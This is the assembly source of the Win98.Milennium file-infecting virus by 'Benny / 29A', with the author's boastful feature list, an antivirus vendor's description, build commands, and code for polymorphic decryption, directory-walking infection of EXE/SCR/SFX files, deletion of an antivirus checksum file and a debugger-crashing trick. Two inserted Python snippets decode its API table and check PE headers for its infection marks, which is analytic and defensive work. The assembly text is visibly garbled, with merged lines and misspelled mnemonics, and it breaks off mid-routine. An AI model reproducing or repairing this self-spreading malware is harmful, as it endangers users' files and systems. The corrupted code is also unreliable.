; Win98.Milennium
; by Benny / 29A
;
;
;
; Author's Description
; ======================
;
;
; I'm very proud to introduce the first multifiber virus ever. Not only that, it is
; also a multithreaded, polymorphic, compressed, armoured Win98 PE file infector
; with a structure similar to neural nets. For those ppl that don't know what a
; fiber is, I can say: "There r many differences between threads and fibers, but
; this one is the most important: threads r scheduled by a specific operating
; system's algorithm, so it's 50% up to the OS which thread will run and which
; not. Fibers r special threads that r scheduled only by your algorithm." I will
; explain all details in my tutorial.
;
;
;
; What happens on execution?
; ----------------------------
;
; Virus will:
; 1) decrypt its body by the polymorphic decryptor
; 2) decompress API strings
; 3) get the module handle of kernel32.dll
; 4) get addresses for all needed APIs
; 5) create the main thread, which:
;    I)    converts the actual thread to a fiber
;    II)   creates all needed fibers
;    III)  finds a file
;    IV)   chex the file
;    V)    infects the file
;    VI)   loops III) - V)
;    VII)  deletes the TBAV checksum file
;    VIII) changes directory by the dot-dot method
;    IX)   loops III) - VII)
;
; 6) chex some flags (=> payload) and jumps to the host program.
;
;
;
; Main Features
; ----------------
;
; Platforms:       Win98, platforms supportin' threads, fibers and the "in" instruction.
; Residency:       nope, direct action only.
; Stealth:         no, due to nonresidency.
; Antidebuggin':   yes, uses threads, fibers and the IsDebuggerPresent API.
; Antiheuristix:   yes, uses threads, fibers and the polymorphic engine.
; Antiantivirus:   yes, deletes the TBAV checksum file.
; Fast infection:  yes, infects all files in the directory structure.
; Polymorphism:    yes.
; Other features:  a) usin' "memory-mapped files".
;                  b) no use of absolute addresses.
;                  c) the only way how to detect this virus is to check the PE header
;                     for suspicious flags (new section and flags in the last section)
;                     or to find the decryption routine (that's not easy, it's polymorphic).
;                     It can't be detected by a heuristic analyzer due to the use of
;                     threads and fibers. An AV scanner can't trace all APIs
;                     and can't know all of 'em in this age. I think this is
;                     the best antiheuristic technique.
;                  d) usin' SEH for handlin' expected and unexpected exceptions.
;                  e) infects EXE, SCR, BAK, DAT and SFX (WinRAR) files.
;                  f) two ways how to infect a file: 1) append to the last section
;                                                    2) create a new section
;                  g) similar structure to neural nets.
;                  h) Unicode support for future versions of Windozes.
;
;
;
; Payload
; --------
;
; If the virus is at least the 50th generation of the original, it displays
; a MessageBox with probability 1:10.
;
;
;
; AVP's Description
; ==================
;
; This is not a dangerous parasitic Win98 direct-action polymorphic virus. It
; uses several Windows APIs included only in Windows 98 and Windows NT 3.51
; Service Pack 3 or higher, and will not work under Windows 95. Due to
; infection-related bugs, it also doesn't work under WinNT and Win2000, so it
; is a Win98-specific virus. The infection mechanism used is a very tricky one,
; and a very stable one under Win98, too. It makes this virus a very fast
; infector, but several infection-related bugs reveal the virus presence in
; non-Win98 systems. When executed, the virus searches for PE executable files
; in the current directory and all the upper directories. During infection the
; virus uses two infection ways: it increases the size of the last file section for
; its code, or adds a new section called ".mdata". At each 30th infected file the
; virus, depending on the system timer (in one case of 10), displays the
; following message box:
;
;    ----------------------------------------------------
;    | Win32.Milennium by Benny / 29A                   |
;    ----------------------------------------------------
;    | First Multifiber Virus Is Here, BEWARE OF ME ;-) |
;    | Click Ok if u wanna run this shit..              |
;    ----------------------------------------------------
;
;
; Technical Details
; ------------------
;
; When an infected file is executed, the polymorphic routine will decrypt the
; constant virus body. Next, the virus unpacks the API names using the
; following scheme: each API name is split in words, and each word that appears
; twice is stored in a dictionary (for example the SetFileAttributes and
; GetFileAttributes APIs are encoded like this:
;
;   Dictionary: Set, Get, File, Attributes
;   Encoding:   1, 3, 4, 2, 3, 4).
;
; Any word that is not in the dictionary is stored "as is". After unpacking the API
; names, it gets the addresses for all the used APIs. Then it creates a thread
; and waits for it to finish.
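The dictionary scheme just described, as an added example (not code from the page or from the virus): a packer and unpacker over the 14-word dictionary the source later defines as string_subs, where a byte below 15 is a 1-based dictionary index, any other byte is a literal character, 0 ends a name and 0FFh ends the table. The sample packed table is constructed here, so an analyst can see how such a table expands back into plain API names.

```python
# Packer/unpacker for the dictionary-compressed API name table described above.
# Byte values 1..14 index the dictionary (1-based), other non-zero bytes are
# literal characters, 0 terminates a name and 0xFF terminates the whole table.
NUMOF_CSZ = 15   # first byte value that is a literal character, as in the source
DICTIONARY = ["File", "Get", "Set", "Module", "Handle", "Create", "Find", "Close",
              "ViewOf", "CurrentDirectoryA", "Fiber", "Thread", "Delete", "Library"]


def pack_api_name(name: str) -> bytes:
    """Greedily replace dictionary words in one API name by their 1-based index, 0-terminated."""
    out, i = bytearray(), 0
    while i < len(name):
        for idx, word in enumerate(DICTIONARY, start=1):
            if name.startswith(word, i):
                out.append(idx)
                i += len(word)
                break
        else:
            # printable ASCII is always >= 0x20, so literals never collide with indices
            assert ord(name[i]) >= NUMOF_CSZ, "literal byte would be read as a dictionary index"
            out.append(ord(name[i]))
            i += 1
    out.append(0)
    return bytes(out)


def unpack_api_names(table: bytes) -> list:
    """Expand a whole packed table (0xFF-terminated) back into the list of API names."""
    names, current = [], []
    for b in table:
        if b == 0xFF:                 # end of table
            break
        if b == 0:                    # end of one name
            names.append("".join(current))
            current = []
        elif b < NUMOF_CSZ:           # dictionary reference
            current.append(DICTIONARY[b - 1])
        else:                         # literal character
            current.append(chr(b))
    return names


# Constructed sample table (not bytes taken from the page).
SAMPLE_TABLE = (pack_api_name("GetModuleHandleA") + pack_api_name("CreateThread")
                + pack_api_name("WaitForSingleObject") + pack_api_name("SwitchToFiber")
                + b"\xff")

if __name__ == "__main__":
    print(SAMPLE_TABLE.hex())
    print(unpack_api_names(SAMPLE_TABLE))
```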
;
;
; The main thread and fibers
; ---------------------------
;
; The thread converts itself to a fiber and splits the infection process in 7
; pieces:
;
; Fiber 1 - Gets the current directory and searches for the following file
; types: *.exe, *.scr, *.sfx. Then it gives control to Fiber 3. After receiving
; back the control, it deletes the file antivir.dat (if any) from the current
; directory and goes to the upper directory.
;
; Fiber 2 - Checks if the code runs under a debugger and if yes, it makes the
; stack pointer zero. This will result in a debugger crash.
;
; Fiber 3 - Gets a file from the current search started in Fiber 1 and calls
; Fiber 4 to continue. When Fiber 4 is completed, it calls Fiber 7 and waits to
; receive back the control. Then it checks for more files in the current
; directory.
;
; Fiber 4 - Checks if the file size is less than 4GB and then gives control to
; Fiber 5. After Fiber 5 completes, it checks if the file is an EXE file, if the
; target processor is Intel and if the file is not a DLL. Also, it pays
; attention to the imagebase (only files with imagebase = 400000h are infected
; - most applications are infectable from this point of view). Then it gives
; control to Fiber 6 and waits to receive it back.
;
; Fiber 5 - Opens the current file and creates a mapping object for this file to
; make the infection process easier. Next, it calls Fiber 6 and sleeps till it gets
; back the control.
;
; Fiber 6 - Closes the current file, restores the file time and date and, if
; needed, grows the current file to fit the virus code.
;
; Fiber 7 - Calls the main infection routine.
;
;
; File Infection Routine
; -----------------------
;
; When infecting a file, the virus scans its imports for one of the following
; APIs: GetModuleHandleA and GetModuleHandleW. This will be used by the virus
; to get the addresses of the APIs needed to spread. If the host file does not
; import one of them, it is not infected. The virus adds its code - there's
; one chance in three to create a new section, called .mdata. Otherwise, it
; increases the size of the last section. Then it calls its polymorphic engine
; to generate an encrypted image of the virus and the decryptor for it and
; writes the generated code into the host file.
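The feature list above says the practical way to detect this infector is to inspect the PE header for the marks it leaves (a new section, changed flags on the last section), and this routine together with the check-file fiber names them: a section called .mdata, last-section flags 0E0000000h (execute/read/write), the entry point moved into the last section, and the "already infected" byte written into the MZ header's e_res2 field. As an added example, not code from the page, here is a Python header check for exactly those indicators; the PE32 image it inspects is constructed in memory (not a real file), and the indicator names are my own.

```python
import struct

# Layout constants from the PE/COFF format (PE32 files).
IMAGE_DOS_SIGNATURE = 0x5A4D         # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550      # "PE\0\0"
SECTION_HEADER_FMT = "<8sIIIIIIHHI"  # 40-byte IMAGE_SECTION_HEADER
E_RES2_OFFSET = 0x28                 # e_res2 in the MZ header: the "already infected" mark
RWX_FLAGS = 0xE0000000               # EXECUTE | READ | WRITE, the flags described on the page


def parse_pe(data: bytes):
    """Return (entry_point_rva, [section dicts]) for a PE32 image; raise on non-PE input."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or struct.unpack_from("<I", data, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("no PE signature")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]    # FileHeader.NumberOfSections
    size_of_opt = struct.unpack_from("<H", data, e_lfanew + 20)[0]    # FileHeader.SizeOfOptionalHeader
    opt_off = e_lfanew + 24
    entry_rva = struct.unpack_from("<I", data, opt_off + 16)[0]       # OptionalHeader.AddressOfEntryPoint
    sections = []
    for i in range(num_sections):
        off = opt_off + size_of_opt + i * struct.calcsize(SECTION_HEADER_FMT)
        name, vsize, va, _, _, _, _, _, _, flags = struct.unpack_from(SECTION_HEADER_FMT, data, off)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "flags": flags})
    return entry_rva, sections


def milennium_indicators(data: bytes) -> list:
    """Return the sorted list of header indicators (named here) that are present in the image."""
    entry_rva, sections = parse_pe(data)
    found = []
    if data[E_RES2_OFFSET] != 0:                       # the infector writes 1 into e_res2
        found.append("mz-e_res2-marker")
    if any(s["name"] == ".mdata" for s in sections):   # new-section infection method only
        found.append("section-.mdata")
    if sections:
        last = sections[-1]
        if last["flags"] & RWX_FLAGS == RWX_FLAGS:     # both methods leave the last section RWX
            found.append("last-section-rwx")
        if last["va"] <= entry_rva < last["va"] + last["vsize"]:  # both methods move the EP there
            found.append("entry-point-in-last-section")
    return sorted(found)


def build_sample_pe(infected: bool) -> bytes:
    """Constructed, non-runnable PE32 header image for testing; not derived from any real file."""
    # (name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, Characteristics)
    sections = [(b".text", 0x1000, 0x1000, 0x200, 0x400, 0x60000020),
                (b".data", 0x1000, 0x2000, 0x200, 0x600, 0xC0000040)]
    entry_rva = 0x1010
    dos = bytearray(0x40)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew: PE header right after MZ header
    if infected:
        dos[E_RES2_OFFSET] = 1                         # infection mark
        sections.append((b".mdata", 0x1000, 0x3000, 0x400, 0x800, RWX_FLAGS))
        entry_rva = 0x3010                             # entry point inside the added section
    opt = bytearray(224)                               # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)              # Magic: PE32
    struct.pack_into("<I", opt, 16, entry_rva)         # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)          # ImageBase (the only one the infector accepts)
    struct.pack_into("<I", opt, 32, 0x1000)            # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)             # FileAlignment
    struct.pack_into("<I", opt, 56, 0x1000 * (len(sections) + 1))  # SizeOfImage
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    headers = b"".join(struct.pack(SECTION_HEADER_FMT, n, vs, va, rs, rp, 0, 0, 0, 0, fl)
                       for n, vs, va, rs, rp, fl in sections)
    return bytes(dos) + struct.pack("<I", IMAGE_NT_SIGNATURE) + coff + bytes(opt) + headers


if __name__ == "__main__":
    print("clean   :", milennium_indicators(build_sample_pe(False)))
    print("infected:", milennium_indicators(build_sample_pe(True)))
```

The e_res2 and .mdata checks are specific to this family; an RWX last section holding the entry point is a generic appended-code heuristic that also fires on the "grow the last section" path, so treat it as a triage signal rather than a verdict.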
;
;
;
; Author's Notes
; ===============
;
; Hmmm, fine. Adrian Marinescu made excellent work. Really. I think he didn't
; miss any important thing nor any internal detail. Gewd werk Adrian!
; Nevertheless, I have to note that Adrian made the description of the
; beta of Milennium. U can see that the payload writes Win32.Milennium instead of
; Win98. That time I didn't test it on WinNTs and I expected it will be
; Win32 compatible. Unfortunately, I forgot that IN is a privileged opcode under
; WinNT (that's the bug Adrian talked about). And after some other
; corrections (beta deleted antivir.dat files instead of anti-vir.dat), I started
; to call this virus Win98 compatible. However, Adrian's informators (or
; himself) probably never saw the sharp version of Milennium. Hmm, maybe l8r. But
; this doesn't change anything on the thing that Adrian deeply analyzed this virus
; and that he made really excellent work. I think that's all.
;
;
;
; Greetz
; =======
;
; All 29Aers ..... thank ya for all! I promise, I'll do everything
;                  I can ever do for 29A.
; LeThalmnd ...... u have a potential, keep workin' on yourself!
; Yesnah ......... find another dolly, babe :-))
; Adrian / GeCAD . fuck off AV, join 29A! X-D
;
;
;
; How to build
; =============
;
; TASM32-ML -Q -M4 Mil.asm
; TLINK32-Tpe -c -x -aa -r mil.obj ,, in import32
Pewrsec.com Mil.exe
;
;
;
; For who is this dedicated?
; ============================
;
; This virus is dedicated to somebody. Hehe, surprisely. It's dedicated to all
; good vxerz (n0t lamerz!!!) with the greet: next milennium will be.
; Don't give up!!!
;
;
;
; (c) 1999 Benny / 29A.
.386p; 386 intertions
.MODEL FLAT; FLAT MODEL
INCLUDE MZ.INC; Include Some Needed Files
INCLUDE PE.IC
Include Win32API.inc
INCLUDE USEFUL.INC
EXTRN EXITPROCESS: PROC; Some Apis Needed by First Generation
EXTRN GETMODULEHANDLEA: PROC
EXTRN GETMODULEW: PROC
.DATA
DB?; for TLINK32 Compatibility
ENDS
Virus code starts here ...
.code
Start:
Pushad; push all regs
@Seh_setupframe; setup SEH FRAME
INC BYTE PTR [EDX]; ===> GP FAULT
JMP Start; Some Stuff for Dumb Emulators
SEH_FN: @seh_removeframe; Remove SEH FRAME
Popad; and pop all regs
; Stuff Above Will Fuck AV-Emulators
Push Eax; Leave Some Space for "Ret" to Host
Pushad; push all regs
Poly Decryptor Starts Here ...
@ J1: DB 3 DUP (90H)
Call @ J2
@ J2: DB 3 DUP (90H)
@ 1: POP EBP
@ J3: DB 3 DUP (90H)
@ 2: Sub EBP, Offset @ J2
@ J4: DB 3 DUP (90H)
; MOV ECX, (virus_end-encrypted 3) / 4
@ 4: DB 10111001B
DD (Virus_END-Encrypted 3) / 4
@ J5: DB 3 DUP (90H)
Lea ESI, [EBP Encrypted]
DB 10001101B @ 3: DB 10110101B
; Regmod
DD Offset Encrypted
@ J6: DB 3 DUP (90H)
Decrypt:
; xor dWord PTR [ESI], 0
DB 10000001B
@ 7: db 00110110b
Key: DD 0
@ J7: DB 3 DUP (90H)
_next_:; add esi, 4
DB 10000011B
@ 8: DB 11000110B
DB 4
@ J8: DB 3 DUP (90H)
; DEC ECX
@ 5: db 01001001b
@ J9: DB 3 DUP (90h)
; Test ECX, ECX
DB 10000101B
@ 6: DB 11001001B
JNE Decrypt
ENCRYPTED:
NFILE = 1; Some Constants for Decompress Stage
Nget = 2
NSET = 3
nmodule = 4
NHANDE = 5
ncreate = 6
NFIND = 7
nclose = 8
NVIEWOF = 9
ncurrentDirectorya = 10
Nfiber = 11
nthread = 12
ndelete = 13
NLibrary = 14
Numof_csz = 15; Number of 'EM
Call Skip_Strings
CStringz:
Module Names
CSZKERNEL32 DB 'KERNEL32', 0
CSZkernel32W dw 'k', 'e', 'r', 'n', 'e', 'L', '3', '2', 0
CSZUSER32 DB 'USER32', 0
Compressed API Names
CSZGETMODULEHANDLEA DB NGET, NMODULE, NHANDLE, 'A', 0
CSZGETMODULEHANDLEW DB NGET, NMODULE, NHANDLE, 'W', 0
CSZCReatethread DB Ncreate, Nthread, 0
CszwaitforsingleObject DB 'WaitForsingleObject', 0
CSZCloseHandle DB NClose, Nhandle, 0
CSZConvertthReadtofiber DB 'Convert', NTHREAD, 'To', NFIBER, 0
CSZCreateFiber DB Ncreate, Nfiber, 0
Cszswitchtofiber DB 'Switchto', NFIBER, 0
Cszdeletefiber DB Ndelete, Nfiber, 0
CSZGETVERSION DB NGET, 'VERSION', 0
CSZFindFirstfilea DB Nfind, 'First', Nfile, 'A', 0
CSZFindNextFilea DB Nfind, 'Next', Nfile, 'A', 0
CSZFindClose DB NFIND, NCLOSE, 0
CSZCReatefilea DB Ncreate, Nfile, 'A', 0
CSZCreateFilemappinga DB Ncreate, Nfile, 'Mappinga', 0cszmapViewoffile DB 'Map', NViewof, Nfile, 0
CSZunmapViewoffile DB 'Unmap', NViewof, Nfile, 0
CSZSETFileAttributesa DB Nset, Nfile, 'Attributesa', 0
CSZSetFilePointer DB Nset, Nfile, 'Pointer', 0
CSZSETENDOFFILE DB NSET, 'Endof', Nfile, 0
CSZSETFILETIME DB NSET, NFILE, 'TIME', 0
CSZGetcurrentDirectorya DB Nget, NCurrentDirectorya, 0
CSZSetcurrentDirectorya DB Nset, NCurrentDirectorya, 0
Cszdeletefile DB Ndelete, Nfile, 'A', 0
CSZLOADLIBRARYA DB 'LOAD', NLIBRARY, 'A', 0
CSZFREELIBRARYA DB 'Free', NLIBRARY, 0
CSZISDebuggerPresent DB 'IsdebuggerPresent', 0
DB 0FFH
SzmessageBoxa DB 'MessageBoxa', 0
Strings for payload
SZTITLE DB 'WIN98.MILENNIUM by Benny / 29A', 0
Sztext DB 'First Multifiber Virus Is Here, BEWARE OF ME! ;-)', 0DH
DB 'Click OK IF U Wanna Run this Shit ...', 0
SKIP_STRINGS:
POP ESI; GET Relative Delta Offset
MOV EBP, ESI
Sub EBP, Offset Cstringz
Lea EDI, [EBP STRINGS]
Next_ch: Lodsb; Decompressing Stage
Test Al, Al
JE COPY_B
CMP AL, 0FFH
JE end_unpacking
CMP Al, Numof_csz
JB Packed
COPY_B: Stosb
JMP next_ch
Packed: Push ESI
Lea ESI, [EBP STRING_SUBS]
MOV CL, 1
MOV DL, Al
Lodsb
Packed2: Test Al, Al
Je _inc_
Packed3: CMP CL, DL
JNE UN_PCK
p_cpy: Stosb
Lodsb
Test Al, Al
JNE P_CPY
POP ESI
JMP next_ch
UN_PCK: LODSB
Test Al, Al
JNE Packed3
_INC_: Inc ECX
JMP UN_PCK
END_UNPACKING:
StoSb; Store 0FFH Byte
Mov ECX, Offset _getmoduleHandlea - 400000H; Some params
GMHA = DWORD PTR $ - 4
Mov EBX, Offset _getmoduleHandlew - 400000H
GMHW = DWORD PTR $ - 4
Lea EDX, [EBP SZKERNEL32] Lea ESI, [EBP SZKERNEL32W]
Call MygetModuleHandle; Pseudo-neuron
Jecxz Error
XCHG EBX, ECX
Lea ESI, [EBP SZAPIS]; Params for Next
Lea EDI, [EBP DDAPIS]
Call MygetProcaddress; Pseudo-neuron
Jecxz Error
XOR EAX, EAX
Lea Edx, [EBP DWTHREADID]
Push Edx
Push EAX
Push EBP
Lea Edx, [EBP MAINTHREAD]
Push Edx
Push EAX
Push EAX
Call [EBP DDCREATHREAD]; CREATE Main Thread
MOV EBX, EAX; Wait for
XOR Eax, Eax; Thread
Dec Eax; Signalization
Push EAX
Push EBX
Call [EBP DDWAITFORSINGLEOBJECT]; ...
Push Ebx; and close handle
Call [EBP DDCLOSEHANDLE]; of main thread
Call payload; Try PayLoad
Error: Mov Eax, [EBP EntryPoint]
Add Eax, 400000H
MOV [ESP.CPUSHAD], EAX
Popad
Ret; and jump to host
; ------------------------------------------------- ------------------------------
PayLoad:
CMP BYTE PTR [EBP GENERATIONCOUNT], 30; 30th generation?
JNE END_PAYLOAD; NOPE
IN Al, 40h
And Al, 9D
Jne end_payload; chance 1:10
Lea EDX, [EBP SZUSER32]; YUP, LOAD LIBRARY
Push EDX; (user32.dll)
Call [EBP DDLOADLIBRARYA]
XCHG EAX, ECX
JECXZ END_PAYLOAD
XCHG ECX, EBX
Lea ESI, [EBP SZMESSAGEBOXA]; Get Address of
Call getProcaddress; MessageBoxa API
XCHG EAX, ECX; Error?
Jecxz end_payload; ...
Push 1000h; Pass Params
Lea Edx, [EBP SZTITLE]
Push Edx
Lea Edx, [EBP SZTEXT]
Push Edx
PUSH 0
Call Ecx; Call API
Push EBX
Call [EBP DDFREELIBRARYA]; and Unload Library
End_payload:
RET
; ------------------------------------------------- ------------------------------
MygetModuleHandle PROC; OUR getModuleHandle Function
JECXZ TRY_GMHW; TRY Unicode Version
MOV EDI, 400000H
Push Edx
_GMH_: Add ecx, edicall [ECX]
XCHG EAX, ECX
Er_GMH: RET
TRY_GMHW:; Unicode Version
MOV ECX, EBX
Jecxz er_gmh
PUSH ESI
JMP _GMH_
MygetModuleHandle Endp
; ------------------------------------------------- ------------------------------
MygetProcaddress Proc; Our GetProcaddress Function
Call getProcAddress
Test Eax, EAX; Error?
JE ER_GPA
StOSD; Store Address
@Endsz; get next api name
CMP BYTE PTR [ESI], 0FFH; END OF API NAMES?
JNE MygetProcaddress; No, Next API
Ret; Yeah, Quit
ER_GPA: XOR ECX, ECX
RET
GetProcaddress:
Pushhad
@Seh_setupframe
MOV EAX, EBX
Add eax, [eax.mz_lfanew]
MOV ECX, [eax.nt_optionalheader.oh_directoryentries.de_export.dd_size]
JECXZ Proc_address_not_found
MOV EBP, EBX
Add ebp, [eax.nt_optionalheader.oh_directoryentries.de_export.dd_virtualaddress]
Push ECX
MOV EDX, EBX
Add edx, [ebp.ed_addressofnames]
Mov ECX, [EBP.ED_NUMBEROFNAMES]]
XOR EAX, EAX
Search_for_api_name:
Mov EDI, [ESP 16]
MOV ESI, EBX
Add ESI, [EDX EAX * 4]
Next_char_in_api_name:
CMPSB
JZ matched_char_in_api_name
INC EAX
Loop search_for_api_name
POP EAX
PROC_ADDRESS_NOT_FOND:
XOR EAX, EAX
JMP End_GetProcAddress
Matched_char_in_api_name:
CMP Byte PTR [ESI-1], 0
JNE NEXT_CHAR_IN_API_NAME
POP ECX
MOV EDX, EBX
Add edx, [ebp.ed_addressofordinals]
Movzx Eax, Word PTR [EDX EAX * 2]
Check_index:
CMP EAX, [EBP.ED_NUMBEROFFUNCTION]
JAE Proc_Address_not_found
MOV EDX, EBX
Add Edx, [EBP.ED_ADDRESSOFFUNCTIONS]
Add EBX, [EDX EAX * 4]
MOV EAX, EBX
SUB EBX, EBP
CMP EBX, ECX
JB proc_address_not_found
End_getprocaddress:
@Seh_removeframe
MOV [ESP.PUSHAD_EAX], EAX
Popad
RET
MygetProcaddress Endp
; ------------------------------------------------- ------------------------------ GetProcaddressit PROC; Inputs: Eax - API Name
ECX - LPTR TO MZ HEADER
; EDX - Module Name
; OUTPUTS: EAX - RVA Pointer to IAT, 0 if Error
Pushhad
XOR EAX, EAX
Push EBP
Mov ESI, [ECX.MZ_LFANEW]
Add ESI, ECX
MOV EAX, [ESI.NT_OPTIONALHEADER.OH_DIRECTORYENTRIES.DE_IMPORT.DD_VIRTUALADDRESS]
MOV EBP, ECX
Push ECX
Movzx ECX, Word Ptr [ESI.NT_FILEHEADER.FH_NUMBEROFSECTIONS]
Movzx EBX, Word Ptr [ESI.NT_FILEHEADER.FH_SIZEOFOPTIONALHEADER]
Lea EBX, [ESI.NT_OPTIONALHEADER EBX]
Scan_sections:
Mov edx, [ebx.sh_virtualaddress]
CMP EDX, EAX
JE section_found
SUB EBX, -IMAGE_SIZEOF_SECTION_HEADER
Loop scan_sections
POP ECX
POP EAX
JMP end_getprocaddressit2
Section_found:
MOV EBX, [EBX 20]
Add EBX, EBP
POP ECX
POP EAX
Test EBX, EBX
JE end_getprocaddressit2
XOR ESI, ESI
XOR EBP, EBP
PUSH ESI
Dec EBP
GET_DLL_NAME:
POP ESI
Inc EBP
Mov EDI, [ESP 20]
MOV ECX, [EBX.ESI.ID_NAME]
Test ECX, ECX
JE end_getprocaddressit2
SUB ECX, EDX
SUB ESI, -IMAGE_SIZEOF_IMPORT_DESCRIPTOR
PUSH ESI
Lea ESI, [EBX ECX]
Next_char_from_dll:
Lodsb
Add Al, - '.'
JZ IT_NUP
SUB Al, - '.' 'a'
CMP Al, 'Z' - 'A' 1
JAE NO_UP
Add Al, -20h
NO_UP: SUB Al, -'a '
IT_nup: scaSB
JNE GET_DLL_NAME
CMP Byte PTR [EDI-1], 0
JNE next_char_from_dll
FOUND_DLL_NAME:
POP ESI
Imul EAX, EBP, Image_SIZEOF_IMPORT_DESCRIPTOR
MOV ECX, [EBX Eax.ID_ORIGINALFIRSTHUNK]
JECXZ END_GETPROCADDRESSIT2
SUB ECX, EDX
Add ECX, EBX
XOR ESI, ESI
Next_IMPORTED_NAME:
PUSH ESI
Mov EDI, [ESP 32]
MOV ESI, [ECX ESI]
Test ESI, ESI
JE end_getprocaddressit3
SUB ESI, EDX
Add ESI, EBXLODSW
Next_char:
CMPSB
JNE NEXT_STEP
CMP Byte PTR [ESI-1], 0
Je got_it
JMP next_char
Next_step:
POP ESI
SUB ESI, -4
JMP next_IMPORTED_NAME
GOT_IT: POP ESI
Imul EBP, Image_SizeOf_Import_Descriptor
Add EBX, EBP
Mov Eax, [ebx.id_firstthunk]
Add Eax, ESI
MOV [ESP 28], EAX
JMP end_getprocaddressit
End_getprocaddressit3:
POP EAX
End_getprocaddressit2:
N6: xor Eax, EAX
MOV [ESP.PUSHAD_EAX], EAX
End_getprocaddressit:
Popad
RET
GetProcaddressit Endp
; ------------------------------------------------- ------------------------------
Note: Dendrit = INPUT, AXON = OUTPUT, SYNAPSE = JUMP LINK
; ------------------------------------------------- ------------------------------
MAINTHREAD Proc Pascal Delta_Param: DWORD; Delta Offset As Dendrit
Pushhad; Store All Regs
Mov EBX, Delta_Param; Store Delta Offset
PUSH 0
Call [EBX DDCONVERTTHREADTOFIBER]; Convert Thread to Fiber
XCHG EAX, ECX
JECXZ EXIT_MAIN; Error?
MOV [EBX PFMain], ECX; Store Context
Lea ESI, [EBX NEURON_ADDRESSESSS]; Create All Needed FIBERS
Lea EDI, [EBX FIBER_ADDRESS 4]
MOV ECX, NUM_OF_NEURONS
INIT_NEURONS:
Lodsd
Push ECX
Push EBX
Add Eax, EBX
Push EAX
PUSH 0
Call [EBX DDCREATEFIBER]; CREATE FIBER
POP ECX
Test Eax, EAX
JE EXIT_MAIN
Stosd
Loop init_neurons
Push [EBX PFNEURON_MAIN]
Call [EBX DDSWITCHTOFIBER]; Switch To Main Neuron
EXIT_MAIN:
Popad
RET
MAINTHREAD ENDP
; ------------------------------------------------- ------------------------------
NEURON_MAIN Proc Pascal Delta_Param: DWORD; DELTA Offset As Dendrit
Pushhad; Store All Regs
Mov EBX, Delta_Param; Store Delta Offset
Push [EBX PFNEURON_DEBUGER]
Call [EBX DDSWITCHTOFIBER]; Dwitch to Neuronlea EDX, [EBX CURDIR]
Push Edx
PUSH MAX_PATH
Call [EBX DDGETCURRENTDIRECTORYA]; Store Current Directory
MOV ECX, 20
PATH_WALK:
Push ECX
LEA ESI, [EBX SZEXE]; Extension
MOV ECX, NUM_OF_EXTS
Process_dir:
Push ECX
MOV [EBX NFINDFILE_NAME], ESI; Dendrit
MOV [EBX NFF_SYNAPSE], OFFSET PFNEURON_MAIN; Build Synapse
Push [EBX PFNEURON_FINDFILE]
Call [EBX DDSWITCHTOFIBER]; Infect Directory
@endsz
POP ECX
Loop process_dir; Next Extension
Lea ESI, [EBX DTAVTBAV]
PUSH 0
PUSH ESI
Call [EBX DDSETFILEATTRIBUTESA]; Blank File Attributes
PUSH ESI
Call [EBX DDDELETEFILEA]; Delete TBAV CHECKSUM FILE
Lea Edx, [EBX DOTDOT]
Push Edx
Call [EBX DDSETCURRENTDIRECTORYA]; Switch to Subdirectory
POP ECX
Loop path_walk
Lea Edx, [EBX CURDIR]
Push Edx
Call [EBX DDSETCURRENTDIRECTORYA]; SWITCH Back
Push [EBX PFMain]
Call [EBX DDSWITCHTOFIBER]; Switch Back to Main Fiber
Popad
RET
NEURON_MAIN ENDP
; ------------------------------------------------- ------------------------------
Neuron_Debugger Proc Pascal Delta_Param: DWORD; DELTA Offset As Dendrit
Pushhad; Store All Regs
Mov EBX, Delta_Param; Store Delta Offset
Call [EBX DDISDEBUGERPRESENT]; Is Debugger Present?
XCHG EAX, ECX
JECXZ END_DEBUGER; NOPE, JUMP TO END
IN AL, 40H; this Will Cause Execution
XOR ESP, ESP; "xor ESP, ESP" Under TD32
End_debugger:
Push [EBX PFNEURON_MAIN]
Call [EBX DDSWITCHTOFIBER]; JUMP Back to Main Neuron
Popad
RET
NEURON_DEBUGGER ENDP
; ------------------------------------------------- ------------------------------
NEURON_FINDFILE PROC PASCAL DELTA_PARAM: DWORD; Delta Offset As dendritn_findfile:
Pushad; save all regs
Mov EBX, Delta_Param; Store Delta Offset
Mov EDX, 0; Pointer to File Name
NfindFile_name = DWORD PTR $ - 4; as dendrit
Lea Eax, [EBX WFD]; Find First File
Push EAX
Push Edx
Call [EBX DDFINDFIRSTFILEA]
XCHG EAX, ECX
JECXZ END_FINDFILE
MOV [EBX SearchHandle], ECX; Save Search Handle
Checkfile:
MOV [EBX NCF_SYNAPSE], OFFSET PFNEURON_FINDFILE; Build Synapse
Push [EBX PFNEURON_CHECKFILE]
Call [EBX DDSWITCHTOFIBER]; And Switch to Neuron
XOR EAX, EAX
CMP Al, 0
ncheckfile_ok = byte PTR $ - 1; Check Axon
JE FIND_NEXT_FILE; Check Failed?
MOV [EBX NIF_SYNAPSE], OFFSET PFNEURON_FINDFILE; Build Synapse
Push [EBX PFNEURON_INFECTFILE]
Call [EBX DDSWITCHTOFIBER]; And Switch to Neuron
Find_next_file:
Lea EDX, [EBX WFD]
Push Edx
Push [EBX SearchHandle]
Call [EBX DDFINDNEXTFILEA]; Find Next File
Test Eax, EAX
JNE CHECKFILE; R Twse More Files?
Push [EBX SearchHandle]
Call [EBX DDFINDCLOSE]; NOPE, Close Search Handle
END_FINDFILE:
Push [EBX DWTHREADID]
NFF_SYNAPSE = DWORD PTR $ - 4; Jump to Previous Neuron
Call [EBX DDSWITCHOFIBER]; (Depends on Synapse)
Popad
JMP n_findfile
Neuron_FindFile Endp
